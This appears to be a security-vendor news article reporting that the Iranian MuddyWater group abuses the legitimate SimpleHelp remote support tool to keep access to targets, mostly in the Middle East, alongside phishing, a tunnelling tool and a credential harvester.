HQ/EMEAFind out how we can help your business
MuddyWater, an Iran-based cybercriminal group, has exploited the SimpleHelp remote support software for its threat campaigns. This Iranian threat actor has been notorious for depending on legitimate remote admin tools to infect targeted systems worldwide.
This state-sponsored threat group has previously adopted legitimate remote administration tools such as RemoteUtilities, ScreenConnect, and Syncro. However, a new investigation revealed that the group has begun to use a new tool called SimpleHelp which helped them execute persistent attacks. The group has been employing this tool since June last year.
The MuddyWater threat group emerged in 2017 and has been a significant ally of the Iranian Ministry of Intelligence and Security. In addition, the group’s primary target includes Middle Eastern countries, such as Saudi Arabia, Jordan, the United Arab Emirates, Afghanistan, Israel, Iraq, Turkey, Pakistan, Azerbaijan, and Jordan. Some of its attacks have also reached the United States.
The MuddyWater group could establish persistence in a targeted system through SimpleHelp.
According to investigations, the MuddyWater group could ensure its persistence in its recent attack using SimpleHelp since it is a legitimate remote device control and management tool.
The researchers explained that the threat actors found a loophole to use the tool and utilise it for the role it was meant to be.
However, the precise distribution method for the SimpleHelp samples is currently not straightforward, but the group who utilised it is notorious for sending spread-phishing messages that contain malicious links.
The recent findings were supported by another researcher earlier this year. The study showed that the MuddyWater campaigns in Saudi Arabia and Egypt used the SimpleHelp tools to launch the Ligolo reverse-tunnelling tool and a credential harvester malware.
Furthermore, the researchers added that they had observed an unknown infrastructure run by the group and a PowerShell script that could receive commands from a remote server. These details came out a week after Microsoft explained MuddyWater’s attack process and how it carries catastrophic attacks on hybrid environments under the guise of a ransomware campaign.
Organisations, especially from the Middle East, should be vigilant in these campaigns as the MuddyWater threat group found an efficient tool that could aid them with their attacks.
